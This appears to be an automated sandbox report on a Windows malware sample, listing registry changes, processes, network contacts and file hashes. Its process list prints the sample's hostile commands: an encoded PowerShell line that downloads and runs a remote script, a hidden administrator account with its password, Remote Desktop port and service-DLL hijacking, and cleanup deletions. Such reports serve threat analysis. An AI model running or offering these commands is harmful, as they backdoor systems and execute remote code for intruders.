| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4730.tmp" "c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 6B1GhkZz /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 6B1GhkZz /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 6B1GhkZz /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 6B1GhkZz
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 6B1GhkZz
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 6B1GhkZz
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | platform.wondershare.com | udp |
| N/A | 47.91.67.36:80 | platform.wondershare.com | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | www.speedtest.net | udp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:443 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | c.speedtest.net | udp |
| N/A | 151.101.2.219:443 | c.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.kabeltex.nl | udp |
| N/A | 82.151.33.2:8080 | speedtest.kabeltex.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.zeelandnet.nl | udp |
| N/A | 212.115.192.180:8080 | speedtest.zeelandnet.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.caiw.net | udp |
| N/A | 62.45.44.26:8080 | speedtest.caiw.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.worldstream.nl | udp |
| N/A | 185.182.195.78:8080 | speedtest.worldstream.nl | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/1868-114-0x0000000000680000-0x0000000000681000-memory.dmp
memory/1868-116-0x000000001B9F0000-0x000000001B9F2000-memory.dmp
memory/3160-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/3160-120-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
memory/3160-122-0x0000000005B10000-0x0000000005B41000-memory.dmp
memory/3160-123-0x0000000001A30000-0x0000000001A31000-memory.dmp
memory/988-125-0x0000000000000000-mapping.dmp
memory/3420-124-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/3420-129-0x0000020B69330000-0x0000020B695DA000-memory.dmp
memory/3420-132-0x0000020B69073000-0x0000020B69075000-memory.dmp
memory/3420-133-0x0000020B69075000-0x0000020B69076000-memory.dmp
memory/3420-134-0x0000020B69076000-0x0000020B69077000-memory.dmp
memory/3420-131-0x0000020B69070000-0x0000020B69072000-memory.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/1752-136-0x0000000000000000-mapping.dmp
memory/2100-137-0x0000000000000000-mapping.dmp
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
| MD5 | ad0967a0ab95aa7d71b3dc92b71b8f7a |
| SHA1 | ed63f517e32094c07a2c5b664ed1cab412233ab5 |
| SHA256 | 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc |
| SHA512 | 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
memory/1752-145-0x00000222F2400000-0x00000222F2401000-memory.dmp
memory/1752-148-0x00000222F2750000-0x00000222F2751000-memory.dmp
memory/1752-149-0x00000222F25C0000-0x00000222F25C2000-memory.dmp
memory/1752-150-0x00000222F25C3000-0x00000222F25C5000-memory.dmp
memory/2100-151-0x00000000009F0000-0x00000000009F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
